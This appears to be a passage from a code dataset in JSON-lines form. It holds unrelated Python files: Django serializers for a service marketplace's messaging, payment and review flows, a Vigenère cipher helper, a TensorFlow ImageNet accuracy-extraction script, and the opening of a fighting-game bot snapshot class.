= dt.datetime.fromtimestamp(float(data['reference_ts']))\n except:\n raise ValidationError(_('Debe pasar reference_ts en el formato timestamp.'))\n\n if not self.instance.questions.filter(ts=reference_ts) and \\\n not self.instance.com_channel.filter(ts=reference_ts):\n raise ValidationError(_('No existe un mensaje con ese reference_ts.'))\n\n if self.instance.questions.filter(reference_ts=reference_ts) or \\\n self.instance.com_channel.filter(reference_ts=reference_ts):\n raise ValidationError(_('Este mensaje ya ha sido respondido.'))\n\n data['reference_ts'] = reference_ts\n\n if data['type'] == Message.TYPE_TEXT:\n data.pop('attachment', None)\n\n if not data.get('content'):\n raise ValidationError(\n {'content': _('El mensaje no tiene contenido.')}\n )\n\n else:\n # data.pop('content', None)\n attachment = data.get('attachment')\n\n if not attachment:\n raise ValidationError(\n {'attachment': _('El mensaje no tiene archivo adjunto.')}\n )\n\n return data\n\n def update(self, instance, validated_data):\n message = Message(ts=dt.datetime.now(),\n owner=self.context['request'].user, **validated_data)\n\n if message.type != Message.TYPE_TEXT:\n message.attachment.save(message.attachment.name, \n message.attachment, save=False)\n\n if instance.status == Request.STATUS_TODO:\n instance.modify(push__questions=message)\n # Get round partner info if exists\n is_round_partner, round_partner = self.get_round_partner(instance)\n # Update last activity if it is round partner\n if is_round_partner:\n round_partner.last_activity = dt.datetime.now()\n round_partner.save()\n # Send notifications to all round partner but the sender\n notify_round_partners = [rp for rp in instance.round_partners if rp is not round_partner]\n # Send message to each partner\n for rp in notify_round_partners:\n rp.partner.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['have_new_message'])\n else:\n instance.modify(push__com_channel=message)\n # Send message to partner\n instance.partner.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['have_new_message'])\n\n # Send message to client\n instance.client.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'client'},\n **CLIENT_MESSAGES['have_new_message'])\n\n return instance\n\n # Returns True if user is round partner\n def get_round_partner(self, instance):\n # Get round partners\n round_partners = instance.round_partners\n # Check if user is round Partner\n try:\n # Returns round partner index\n round_partner_index = [round_partner.partner.account.paypal_email for round_partner in round_partners].index(self.context['request'].user)\n is_round_partner = True\n round_partner = round_partners[round_partner_index]\n except:\n # If index search throws an exception, \n is_round_partner = False\n round_partner = None\n # Return if exists and round partner\n return (is_round_partner, round_partner)\n\n\nclass PaymentTokenSerializer(DocumentSerializer):\n payment_token = serializers.SerializerMethodField()\n bill = serializers.SerializerMethodField()\n status_display = serializers.SerializerMethodField()\n interface = fields.ChoiceField(required=False,\n choices=Transaction.INTERFACE_CHOICES)\n\n class Meta:\n model = Request\n fields = ('status_display', 'status', 'partner',\n 'payment_token', 'bill', 'interface', )\n extra_kwargs = {\n 'partner': {'required': False, 'write_only': True},\n }\n\n def validate(self, data):\n if self.instance.status == Request.STATUS_TODO:\n if data.get('partner') is None:\n raise ValidationError({'partner': self.error_messages['required']})\n\n round_partner = self.instance.round_partners.get(partner=data.get('partner'))\n if not round_partner.price:\n raise ValidationError(_('El socio seleccionado no ha establecido su propuesta.'))\n\n return {'round_partner': round_partner, 'interface': data.get('interface', 'bypass')}\n\n else:\n return {'interface': self.instance.transactions[0].interface}\n\n def get_bill(self, instance):\n return instance.calculate_bill(\n self.validated_data.get('round_partner'),\n self.validated_data.get('interface'))\n\n def get_payment_token(self, instance):\n bill = self.get_bill(instance)\n payment_interface = get_interface(\n self.validated_data.get('interface'))\n return payment_interface.generate_token(amount=bill['to_pay'])\n\n def get_status_display(self, instance):\n return instance.get_status_display()\n\n\nclass RejectRequestSerializer(DocumentSerializer):\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n status_display = serializers.SerializerMethodField()\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created', )\n read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created', )\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def save(self, **kwargs):\n partner = self.context['request'].user.partner_profile\n self.instance.round_partners.filter(partner=partner) \\\n .update(rejected=True, date_response=dt.datetime.now())\n\n partner.modify(pull__requests_todo=self.instance, \n push__requests_rejected=self.instance)\n\n ## TODO: pendiente enviar request a otro round partner\n self.instance.save()\n return self.instance\n\nclass CancelRequestSerializer(DocumentSerializer):\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n status_display = serializers.SerializerMethodField()\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created', )\n read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created', )\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def save(self, **kwargs):\n self.instance.refund()\n\n self.instance.partner.modify(pull__requests_in_progress=self.instance,\n push__requests_canceled=self.instance)\n self.instance.client.modify(pull__requests_in_progress=self.instance,\n push__requests_canceled=self.instance, last_activity=dt.datetime.now())\n self.instance.modify(status=Request.STATUS_CANCELED, date_canceled=dt.datetime.now())\n\n Bill.make_bill(self.instance)\n\n # Send notification to the partner, client has canceled the request\n self.instance.partner.account.send_message(context={'request': self.instance},\n data={'request_id': str(self.instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['client_cancel_request'])\n\n return self.instance\n\n\nclass AcceptOfferSerializer(DocumentSerializer):\n status_display = serializers.SerializerMethodField()\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n\n payment_id = fields.CharField(write_only=True)\n payer_id = fields.CharField(write_only=True)\n interface = fields.ChoiceField(default='bypass',\n choices=Transaction.INTERFACE_CHOICES)\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created',\n 'partner', 'payment_id', 'payer_id', 'interface', )\n read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created', )\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def validate(self, data):\n round_partner = self.instance.round_partners.get(partner=data.get('partner'))\n if not round_partner.price:\n raise ValidationError(\n _('El socio seleccionado no ha establecido su propuesta.'))\n bill = self.instance.calculate_bill(round_partner, data.get('interface'))\n\n try:\n transaction = Transaction.make_transaction(bill['to_pay'], \n Transaction.OP_REQUEST_PAYMENT, self.context['request'].user, \n payment_id=data.get('payment_id'), payer_id=data.get('payer_id'),\n interface=data.get('interface'), item=self.instance)\n\n except ContextInterfaceError as err:\n raise ValidationError({'interface': err})\n\n now = dt.datetime.now()\n validated_data = {\n 'status': Request.STATUS_IN_PROGRESS, \n 'price': round_partner.price,\n 'sponsor_percent': bill['sponsor_percent'],\n 'partner': round_partner.partner, \n 'date_started': now,\n 'date_promise': now + round_partner.duration,\n 'transaction': transaction\n }\n\n return validated_data\n\n def update(self, instance, validated_data):\n transaction = validated_data.pop('transaction')\n\n instance = super().update(instance, validated_data)\n instance.modify(push__transactions=transaction)\n\n instance.client.modify(pull__requests_todo=instance,\n push__requests_in_progress=instance, last_activity=dt.datetime.now())\n\n for round_partner in instance.round_partners.filter(rejected=False):\n if round_partner.partner == instance.partner:\n round_partner.partner.modify(pull__requests_todo=instance,\n push__requests_in_progress=instance)\n # Send notification to selected partner\n instance.partner.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['were_selected'])\n else:\n round_partner.partner.modify(pull__requests_todo=instance,\n push__requests_rejected=instance)\n # Send notification to rejected partner\n round_partner.partner.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['were_rejected'])\n\n # instance.save()\n return instance\n\n\nclass SubmitRequestSerializer(DocumentSerializer):\n status_display = serializers.SerializerMethodField()\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n\n attachment = fields.FileField(max_length=None, use_url=True, required=True,\n write_only=True, validators=[file_max_size])\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created',\n 'attachment', )\n read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created', )\n validators = [\n FileMimetypeValidator(options=Message.CONTENT_TYPES,\n field='attachment')\n ]\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def update(self, instance, validated_data):\n attachment = validated_data.pop('attachment', None)\n extra = {}\n\n if attachment:\n _type = Message.TYPE_DOC if attachment.content_type in Message.CONTENT_TYPES[\n Message.TYPE_DOC] else Message.TYPE_IMAGE\n message = Message(ts=dt.datetime.now(), owner=self.context['request'].user,\n attachment=attachment, type=_type, last_delivery=True,\n content='Recibo del socio.')\n\n message.attachment.save(message.attachment.name, \n message.attachment, save=False)\n extra['push__com_channel'] = message\n\n instance.modify(status=Request.STATUS_DELIVERED, \n date_delivered=dt.datetime.now(), **extra)\n instance.client.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'client'},\n **CLIENT_MESSAGES['request_delivered'])\n return instance\n\n\nclass ReceiveRequestSerializer(DocumentSerializer):\n status_display = serializers.SerializerMethodField()\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n\n payment_id = fields.CharField(write_only=True)\n payer_id = fields.CharField(write_only=True)\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created',\n 'payment_id', 'payer_id', )\n read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created', )\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def validate(self, data):\n amount = self.instance.calculate_bill()['to_pay']\n ## TODO: Evaluar los descuentos por incumplimiento.\n\n # Compara en caso de que exista una penalizacion por el 40% restante\n if amount > 0:\n try:\n transaction = Transaction.make_transaction(amount,\n Transaction.OP_REQUEST_PAYMENT, self.context['request'].user, \n payment_id=data.get('payment_id'), payer_id=data.get('payer_id'),\n interface=self.instance.transactions[0].interface, item=self.instance)\n \n except ContextInterfaceError as err:\n raise ValidationError({'interface': err})\n else:\n transaction = []\n\n validated_data = {\n 'status': Request.STATUS_PENDING,\n 'transaction': transaction\n }\n\n return validated_data\n\n def update(self, instance, validated_data):\n transaction = validated_data.pop('transaction')\n\n instance = super().update(instance, validated_data)\n instance.modify(push__transactions=transaction)\n\n return instance\n\n\nclass UnsatisfiedRequestSerializer(DocumentSerializer):\n status_display = serializers.SerializerMethodField()\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n\n cause = fields.CharField(required=True, write_only=True)\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created',\n 'cause', )\n read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created', )\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def validate(self, data):\n\n if self.instance.date_unsatisfied:\n raise ValidationError(\n {'message':_('Ya ha reportado que está insatisfecho.')})\n\n return data\n\n def update(self, instance, validated_data):\n time_extension = instance.round_partners.get(\n partner=instance.partner).duration / 4\n\n message = Message(ts=dt.datetime.now(),\n owner=self.context['request'].user, content=validated_data['cause'])\n\n instance.modify(status=Request.STATUS_UNSATISFIED,\n date_unsatisfied=dt.datetime.now() + time_extension,\n push__com_channel=message)\n\n ## TODO: incluir un task que revise periodicamente los insatisfechos para realizar la devolucion\n\n # Send Message, the request was marked as unsatisfied\n instance.partner.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['request_unsatisfied'])\n\n return instance\n\n\nclass CloseRequestSerializer(DocumentSerializer):\n status_display = serializers.SerializerMethodField()\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created', )\n read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created', )\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def save(self, **kwargs):\n self.instance.close()\n\n ## TODO: Enviar correo con la factura de asilinks\n return self.instance\n\n\nclass ReviewRequestSerializer(DocumentSerializer):\n status_display = serializers.SerializerMethodField()\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n\n score = serializers.IntegerField(min_value=1, max_value=10, write_only=True, required=True)\n comments = serializers.CharField(write_only=True, required=True)\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created',\n 'score', 'comments', 'client_review', 'partner_review', )\n read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created',\n 'client_review', 'partner_review', )\n depth = 2\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def validate(self, data):\n owner = self.context['request'].user\n if owner.client_profile == self.instance.client:\n if not self.instance.partner_review is None:\n raise ValidationError(\n {'message':_('Ya ha calificado en este requerimiento.')})\n\n elif owner.partner_profile == self.instance.partner:\n if not self.instance.client_review is None:\n raise ValidationError(\n {'message':_('Ya ha calificado en este requerimiento.')})\n\n else:\n raise ValidationError({'message':_('No está asociado a este requerimiento.')})\n\n return data\n\n def update(self, instance, validated_data):\n owner = self.context['request'].user\n review = Review(**validated_data)\n\n if owner.client_profile == self.instance.client:\n instance.modify(partner_review=review)\n instance.client.update_rating()\n instance.partner.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['were_qualified'])\n\n elif owner.partner_profile == self.instance.partner:\n instance.modify(client_review=review)\n instance.partner.update_rating()\n instance.client.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'client'},\n **CLIENT_MESSAGES['were_qualified'])\n\n return instance\n\n\nclass RequestStatisticsSerializer(serializers.Serializer):\n requests_counts = serializers.SerializerMethodField()\n\n def get_requests_counts(self, instance):\n return {\n 'todo': len(instance.requests_todo),\n 'draft': len(getattr(instance, 'requests_draft', [])),\n 'in_progress': len(instance.requests_in_progress),\n 'done': len(instance.requests_done),\n 'canceled': len(instance.requests_canceled),\n }\n","sub_path":"asilinks/requesting/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":41215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"93708201","text":"import files\n\n\n# Шифрование Виженера\ndef function(a, b, c, d):\n j = 0\n for i in range(0, len(a)):\n if j == len(b):\n j = 0\n c[i] += d(a[i], b[j])\n j += 1\n\n\ndef main(result, l, n):\n a = result\n b = files.input_file(n.key_Vigenere)\n c = [0] * len(a)\n function(a, b, c, l) # C - ЗАШИФРОВАННОЕ СООБЩЕНИЕ\n return c","sub_path":"vigenere.py","file_name":"vigenere.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"109040912","text":"'''\n Name: extract.py\n Desc: Extract losses.\n Usage:\n python encode_inputs.py /path/to/cfgdir/ --gpu gpu_id\n'''\nfrom __future__ import absolute_import, division, print_function\n\nimport argparse\nimport os\nimport numpy as np\nimport pdb\nimport pickle\nfrom runstats import Statistics\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport threading\nimport time\n\nimport init_paths\nfrom data.load_ops import resize_rescale_image\nfrom data.load_ops import class_1000_imagenet\nfrom data.load_ops import class_selected_imagenet\nfrom data.task_data_loading import load_and_specify_preprocessors_for_representation_extraction\nimport general_utils\nfrom general_utils import RuntimeDeterminedEnviromentVars\nimport models.architectures as architectures\nfrom models.sample_models import *\nimport utils\n\nparser = argparse.ArgumentParser(description='Extract accuracy for a transfer to class 1000 on ImageNet')\nparser.add_argument( '--cfg_dir', dest='cfg_dir', help='directory containing config.py file, should include a checkpoint directory' )\nparser.set_defaults(cfg_dir=\"/home/ubuntu/task-taxonomy-331b/experiments\")\n\nparser.add_argument('--gpu', dest='gpu_id',\n help='GPU device id to use [0]',\n type=int)\nparser.add_argument('--nopause', dest='nopause', action='store_true')\nparser.set_defaults(nopause=True)\n\nparser.add_argument('--selected', dest='is_selected', action='store_true')\nparser.set_defaults(is_selected=False)\n\nparser.add_argument('--transfer', dest='pretrain_transfer', action='store_true')\nparser.set_defaults(pretrain_transfer=False)\n\nparser.add_argument('--transfer-type', dest='pretrain_transfer_type')\nparser.set_defaults(pretrain_transfer_type='full_taskonomy_beta1/DO_NOT_REPLACE_TARGET_DECODER/16k')\n\nparser.add_argument('--task', dest='task')\n\nparser.add_argument('--data-split', dest='data_split')\nparser.set_defaults(data_split=\"val\" )\n\nparser.add_argument('--out-dir', dest='out_dir')\nparser.set_defaults(out_dir=\"\")\n\nparser.add_argument('--out-name', dest='out_name')\nparser.set_defaults(out_name=\"\")\n\nparser.add_argument('--representation-task', dest='representation_task')\nparser.set_defaults(representation_task=\"\")\n\nparser.add_argument('--print-every', dest='print_every')\nparser.set_defaults(print_every=\"10\")\n\nparser.add_argument('--from-scratch', dest='from_scratch', action='store_true')\nparser.set_defaults(from_scratch=False)\n\nparser.add_argument('--train-mode', dest='train_mode', action='store_true')\n# parser.set_defaults(print_every=\"100\")\n\n# TRAIN_MODE =True \ndef main( _ ):\n args = parser.parse_args()\n global TRAIN_MODE\n TRAIN_MODE = args.train_mode\n #task_list = [\"autoencoder\", \"colorization\",\"curvature\", \"denoise\", \"edge2d\", \"edge3d\", \"ego_motion\", \"fix_pose\", \"impainting\", \"jigsaw\", \"keypoint2d\", \"keypoint3d\", \"non_fixated_pose\", \"point_match\", \"reshade\", \"rgb2depth\", \"rgb2mist\", \"rgb2sfnorm\", \"room_layout\", \"segment25d\", \"segment2d\", \"vanishing_point\"]\n #single channel for colorization !!!!!!!!!!!!!!!!!!!!!!!!! COME BACK TO THIS !!!!!!!!!!!!!!!!!!!!!!!!!!!\n task_list = [ args.task ]\n\n # Get available GPUs\n local_device_protos = utils.get_available_devices()\n print( 'Found devices:', [ x.name for x in local_device_protos ] ) \n # set GPU id\n if args.gpu_id:\n print( 'using gpu %d' % args.gpu_id )\n os.environ[ 'CUDA_VISIBLE_DEVICES' ] = str( args.gpu_id )\n else:\n print( 'no gpu specified' )\n \n for task in task_list:\n if args.is_selected:\n to_task = 'class_selected'\n target_loading_fn = class_selected_imagenet\n else:\n to_task = 'class_1000'\n target_loading_fn = class_1000_imagenet\n if args.pretrain_transfer:\n task_dir = os.path.join(args.cfg_dir, args.pretrain_transfer_type, \"{}__{}__8__unlocked\".format(task, to_task))\n else:\n task_dir = os.path.join(args.cfg_dir, 'final', task)\n cfg = utils.load_config( task_dir, nopause=args.nopause )\n \n root_dir = cfg['root_dir']\n if args.is_selected:\n split_file = os.path.abspath( os.path.join( root_dir, 'assets/aws_data/val_selected_imagenet_info.pkl') )\n else:\n split_file = os.path.abspath( os.path.join( root_dir, 'assets/aws_data/val_split_imagenet_info.pkl') )\n cfg['dataset_dir'] = '/home/ubuntu/imagenet'\n\n cfg['train_filenames'] = split_file\n cfg['val_filenames'] = split_file\n cfg['test_filenames'] = split_file \n\n if 'train_list_of_fileinfos' in cfg:\n split_file_ = os.path.join(\n cfg['input_cfg']['log_root'], task,\n '{task}_val_imagenet_representations.pkl'.format( task=task ))\n cfg['train_representations_file'] = split_file_\n cfg['val_representations_file'] = split_file_\n cfg['test_representations_file'] = split_file_\n\n split_file_ = os.path.join(root_dir, 'assets/aws_data/val_imagenet.npy')\n cfg['train_list_of_fileinfos'] = split_file_\n cfg['val_list_of_fileinfos'] = split_file_\n cfg['test_list_of_fileinfos'] = split_file_\n\n # cfg['resize_interpolation_order'] = 0\n # if cfg['model_path'] is None:\n # cfg['model_path'] = os.path.join(cfg['dataset_dir'], \"model_log\", task, \"model.permanent-ckpt\") \n cfg['target_from_filenames'] = target_loading_fn\n # Try latest checkpoint by epoch\n cfg['model_path'] = tf.train.latest_checkpoint(\n os.path.join(\n cfg['log_root'],\n 'logs',\n 'slim-train'\n ))\n\n # Try latest checkpoint by time\n if cfg['model_path'] is None:\n cfg['model_path'] = tf.train.latest_checkpoint(\n os.path.join(\n cfg['log_root'],\n 'logs',\n 'slim-train',\n 'time'\n )) \n \n # Try to get one saved manually\n if cfg['model_path'] is None: \n cfg['model_path'] = os.path.join(cfg['log_root'], task, \"model.permanent-ckpt\") \n # cfg['model_path'] = os.path.join(cfg['log_root'], 'logs', 'slim-train', 'time', \"model.ckpt-1350\") \n\n finetuned=True\n if finetuned:\n cfg['model_path'] = os.path.join(cfg['log_root'], task, \"imagenet_scratch\") \n\n cfg['randomize'] = False\n cfg['num_epochs'] = 3\n cfg['batch_size'] = 32 if TRAIN_MODE else 1\n cfg['num_read_threads'] = 3\n if 'batch_size' in cfg['encoder_kwargs']:\n cfg['encoder_kwargs']['batch_size'] = cfg['batch_size']\n try:\n cfg['target_cfg']['batch_size'] = cfg['batch_size']\n except:\n pass\n try:\n cfg['target_cfg']['encoder_kwargs']['batch_size'] = cfg['batch_size']\n except:\n pass\n\n loss_dir = args.cfg_dir\n cfg['finetune_encoder_imagenet'] = True\n cfg['data_used'] = 100000000\n cfg['input_cfg']['num_input'] = 1\n run_extract_losses( args, cfg, loss_dir, task )\n\n\ndef run_extract_losses( args, cfg, save_dir, given_task ):\n transfer = (cfg['model_type'] == architectures.TransferNet)\n if transfer:\n get_data_prefetch_threads_init_fn = utils.get_data_prefetch_threads_init_fn_transfer_imagenet\n setup_input_fn = utils.setup_input_transfer_imagenet\n else:\n setup_input_fn = utils.setup_input\n get_data_prefetch_threads_init_fn = utils.get_data_prefetch_threads_init_fn\n\n # set up logging\n tf.logging.set_verbosity( tf.logging.ERROR )\n stats = Statistics()\n top5_stats = Statistics()\n print_every = int(args.print_every)\n\n with tf.Graph().as_default() as g:\n # create ops and placeholders\n inputs = setup_input_fn( cfg, is_training=False, use_filename_queue=False )\n #RuntimeDeterminedEnviromentVars.load_dynamic_variables( inputs, cfg )\n #RuntimeDeterminedEnviromentVars.populate_registered_variables()\n max_steps = get_max_steps(inputs[ 'max_steps' ], args.data_split)\n\n # build model (and losses and train_op)\n model = utils.setup_model( inputs, cfg, is_training=False )\n\n # set up metrics to evaluate\n names_to_values, names_to_updates = setup_metrics( inputs, model, cfg )\n\n # execute training \n start_time = time.time()\n utils.print_start_info( cfg, max_steps, is_training=False )\n\n # start session and restore model\n training_runners = { 'sess': tf.Session(), 'coord': tf.train.Coordinator() }\n try:\n if cfg['model_path'] is None:\n print('Please specify a checkpoint directory')\n return\t\n print('Attention, model_path is ', cfg['model_path']) \n model[ 'saver_op' ].restore( training_runners[ 'sess' ], cfg[ 'model_path' ] )\n\n # var = [v for v in tf.global_variables() if 'decoder' in v.name][0]\n # print(training_runners[ 'sess' ].run(var))\n\n utils.print_start_info( cfg, max_steps, is_training=False )\n data_prefetch_init_fn = get_data_prefetch_threads_init_fn( inputs, cfg, \n is_training=False, use_filename_queue=False )\n prefetch_threads = threading.Thread(\n target=data_prefetch_init_fn,\n args=( training_runners[ 'sess' ], training_runners[ 'coord' ] ))\n prefetch_threads.start()\n \n # run one example so that we can calculate some statistics about the representations\n filenames = []\n accuracies = []\n if transfer:\n accuracy_op = model['model'].decoder.accuracy\n final_output = model['model'].decoder.final_output \n else:\n accuracy_op = model['model'].accuracy\n final_output = model['model'].final_output \n results = training_runners['sess'].run( [ \n inputs[ 'data_idxs' ], model['model'].global_step,\n accuracy_op ] ) \n gs = results[1] \n data_idx = results[0]\n accuracy = results[2]\n filenames.extend(data_idx)\n accuracies.append(accuracy)\n print(\"Step number: {}\".format(gs))\n # print(loss_names_to_vals, data_idx)\n # return\n\n # run the remaining examples\n start = time.perf_counter()\n for step in range( max_steps - 1 ):\n results = training_runners['sess'].run( [\n inputs[ 'data_idxs' ], \n final_output,\n inputs['target_batch'],\n accuracy_op ] ) \n data_idx = results[0]\n accuracy = results[-1]\n logits = results[1]\n gt = results[2]\n sorted_top5 = np.argsort(logits[0])[::-1][:5]\n sorted_gt = np.argsort(gt[0])[::-1][0]\n top5 = 0.\n if sorted_gt in sorted_top5:\n top5 = 1.\n filenames.extend(data_idx)\n accuracies.append(accuracy)\n stats.push(accuracy)\n top5_stats.push(top5)\n if step % print_every == 0 and step > 0: \n print( 'Step {0} of {1}: ({5}: {2:.3f} || Top 5: {3:.3f} :: ({4:.2f} secs/step)'.format( \n step, max_steps - 1,\n stats.mean(), \n top5_stats.mean(),\n # stats.variance(),\n (time.perf_counter() - start) / print_every,\n 'accuracy'\n ))\n start = time.perf_counter()\n\n if training_runners['coord'].should_stop():\n break\n\n os.system(\"sudo touch /home/ubuntu/s3/imagenet_accuracy/{}_{}_{}.txt\".format(\n given_task, int(stats.mean() * 1000) / 10., int(top5_stats.mean() * 1000) / 10.))\n print('The size of losses is %s while we expect it to run for %d steps with batchsize %d' % (len(filenames), inputs['max_steps'], cfg['batch_size']))\n\n end_train_time = time.time() - start_time\n if args.out_name:\n out_name = args.out_name\n else:\n out_name = '{task}_{split}_imagenet_accuracy.pkl'.format(task=given_task, split=args.data_split)\n save_path = os.path.join( save_dir, out_name )\n \n val_accuracy = {}\n with open( save_path, 'wb' ) as f:\n val_accuracy['file_indexes'] = filenames\n val_accuracy['global_step'] = gs\n val_accuracy['accuracy'] = accuracies\n pickle.dump( val_accuracy, f )\n \n if args.out_dir:\n os.makedirs(args.out_dir, exist_ok=True)\n os.system(\"sudo cp {fp} {out}/\".format(fp=save_path, out=args.out_dir))\n else:\n if transfer:\n copy_to = cfg['log_root']\n else:\n copy_to = os.path.join(cfg['log_root'], given_task)\n os.system(\"sudo mv {fp} {dst}/\".format(fp=save_path, dst=copy_to))\n print(\"sudo mv {fp} {dst}/\".format(fp=save_path, dst=copy_to))\n # if transfer:\n # os.makedirs('/home/ubuntu/s3/model_log/losses_transfer/', exist_ok=True)\n # os.system(\"sudo cp {fp} /home/ubuntu/s3/model_log/losses_transfer/\".format(fp=save_path))\n # else:\n # os.makedirs('/home/ubuntu/s3/model_log/losses/', exist_ok=True)\n # os.system(\"sudo cp {fp} /home/ubuntu/s3/model_log/losses/\".format(fp=save_path))\n\n print( 'saved losses to {0}'.format( save_path ))\n print('time to extract %d epochs: %.3f hrs' % (cfg['num_epochs'], end_train_time/(60*60)))\n finally:\n utils.request_data_loading_end( training_runners )\n utils.end_data_loading_and_sess( training_runners )\n\ndef setup_metrics( inputs, model, cfg ):\n # predictions = model[ 'model' ].\n # Choose the metrics to compute:\n # names_to_values, names_to_updates = slim.metrics.aggregate_metric_map( {} )\n return {}, {}\n\n\ndef get_max_steps(original_max_steps, data_split):\n n_images = None\n if data_split == 'train':\n n_images = 129380\n elif data_split == 'val':\n n_images = 50000 \n elif data_split == 'test':\n n_images = 17853\n else: \n raise NotImplementedError('Unknown data split {}'.format(data_split))\n if original_max_steps != n_images:\n print(\"Adjusting number of steps from {} -> {}\".format(\n max(original_max_steps, n_images),\n min(original_max_steps, n_images)\n ))\n return min(original_max_steps, n_images)\n\n\nif __name__=='__main__':\n main( '' )\n\n","sub_path":"code/tools/extract_imagenet_accuracy.py","file_name":"extract_imagenet_accuracy.py","file_ext":"py","file_size_in_byte":15056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"91917326","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2019, Alchemy Meister\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice,this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\n\"\"\"\n\nfrom constants.battle import BattleSide, CharacterIDs\nfrom constants.input import InputAttack, InputDirection\n\nfrom log import LogUtils\n\n# pylint: disable=unused-wildcard-import,wildcard-import\nfrom MoveInfoEnums import * # NOQA\n\nclass BotSnapshot:\n \"\"\"\n \"\"\"\n\n __logger = None\n\n def __init__(self, data_dict):\n \"\"\"\n \"\"\"\n if not BotSnapshot.__logger:\n BotSnapshot.__logger = LogUtils.initialize_module_logger(__name__)\n\n # self.xyz = (\n # data_dict['PlayerDataAddress.x'], data_dict['PlayerDataAddress.y'],\n # data_dict['PlayerDataAddress.z']\n # )\n self.move_id = data_dict['PlayerDataAddress.move_id']\n self.simple_state = SimpleMoveStates(\n data_dict['PlayerDataAddress.simple_move_state'])\n self.attack_type = AttackType(\n data_dict['PlayerDataAddress.attack_type']\n )\n self.startup = data_dict['PlayerDataAddress.attack_startup']\n self.startup_end = data_dict['PlayerDataAddress.attack_startup_end']\n self.attack_damage = data_dict['PlayerDataAddress.attack_damage']\n self.complex_state = ComplexMoveStates(\n data_dict['PlayerDataAddress.complex_move_state'])\n self.damage_taken = 